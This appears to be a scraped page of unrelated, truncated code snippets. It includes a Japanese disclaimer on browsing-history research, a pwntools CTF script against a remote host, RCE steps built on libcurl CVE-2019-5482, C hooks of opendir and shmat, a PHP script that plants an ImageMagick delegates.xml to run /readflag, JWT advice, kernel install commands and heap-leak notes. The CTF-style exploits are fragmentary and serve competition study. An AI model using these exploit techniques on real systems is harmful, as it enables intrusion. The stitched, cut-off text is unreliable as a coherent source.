- この文章と、それに含まれる考察や各サービスへの脆弱性報告などはmala個人の活動であり、所属している企業とは関係ありません。
- 一方で私は、企業が閲覧履歴を収集して何をしたいのか、所属してる企業や他社事例について、ある程度詳しい当事者でもあります。
- 一般論として書けることは書けるが、(業務上知り得た知識で開示されてないものなど)個別具体的なことは書けないこともあり、また観測範囲に偏りがある可能性もあります。
var logger = console.trace; | |
// ELEMENT | |
;(getElementByIdCopy => { | |
Element.prototype.getElementById = function(q) { | |
logger('getElementById', q, this, this.innerHTML); | |
return Reflect.apply(getElementByIdCopy, this, [q]) | |
} | |
})(Element.prototype.getElementById) |
from pwn import * | |
#r = process('./plane_market') | |
r = remote('tasks.aeroctf.com', 33087) | |
c0 = lambda:r.recvuntil(':') | |
c1 = lambda:r.recvuntil('>') | |
s = lambda x:r.send(str(x)) | |
sl = lambda x:r.sendline(str(x)) |
- Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
- Update ip addresses at the source files
- Launch
srv.py
on the server - Upload
sol.php
via curl:curl http://$URL:$PORT/ -d 'rce@sol.php'
123; | |
return 123; | |
} | |
extern void *opendir(const char *); | |
extern void *readdir(void *); | |
extern void *shmat(int, const void *, int); | |
typedef struct { | |
ino_t d_ino; | |
off_t d_off; | |
unsigned short d_reclen; |
# Very minimal BIRD2 configuration with RPKI enabled | |
log syslog { info, remote, warning, error, auth, fatal, bug }; | |
log "/var/log/bird.debug.log" { debug, remote, trace }; | |
router id 193.0.31.28; | |
protocol device { | |
} |
<?php | |
$home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac'; | |
ini_set('display_errors', 1); | |
mkdir("$home/.magick/"); | |
file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>"); | |
mkdir("$home/.config/"); | |
mkdir("$home/.config/ImageMagick"); | |
file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>"); | |
touch("$home/test.foo"); | |
$_ENV['HOME'] = $home; |
TLDR: JWTs should not be used for keeping your user logged in. They are not designed for this purpose, they are not secure, and there is a much better tool which is designed for it: regular cookie sessions.
If you've got a bit of time to watch a presentation on it, I highly recommend this talk: https://www.youtube.com/watch?v=pYeekwv3vC4 (Note that other topics are largely skimmed over, such as CSRF protection. You should learn about other topics from other sources. Also note that "valid" usecases for JWTs at the end of the video can also be easily handled by other, better, and more secure tools. Specifically, PASETO.)
A related topic: Don't use localStorage (or sessionStorage) for authentication credentials, including JWT tokens: https://www.rdegges.com/2018/please-stop-using-local-storage/
The reason to avoid JWTs comes down to a couple different points:
- The JWT specification is specifically designed only for very short-live tokens (~5 minute or less). Sessions
# perform a fresh install of Ubuntu 17.10 | |
# upgrade the kernel to v4.13.10 | |
mkdir ~/kernel-v4.13.10 | |
cd ~/kernel-v4.13.10 | |
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.13.10/linux-headers-4.13.10-041310_4.13.10-041310.201710270531_all.deb | |
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.13.10/linux-headers-4.13.10-041310-generic_4.13.10-041310.201710270531_amd64.deb | |
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.13.10/linux-image-4.13.10-041310-generic_4.13.10-041310.201710270531_amd64.deb | |
sudo dpkg -i *.deb |
/* | |
first malloc(16) : 0x1a61450 | |
eh.. and malloc(-1) : (nil) | |
second malloc(16) : 0x7fe57c0008c0 | |
FYI, libc.so address is : 0x7fe5837dc000 | |
let's calculate! : 0x7fe580000000 | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> |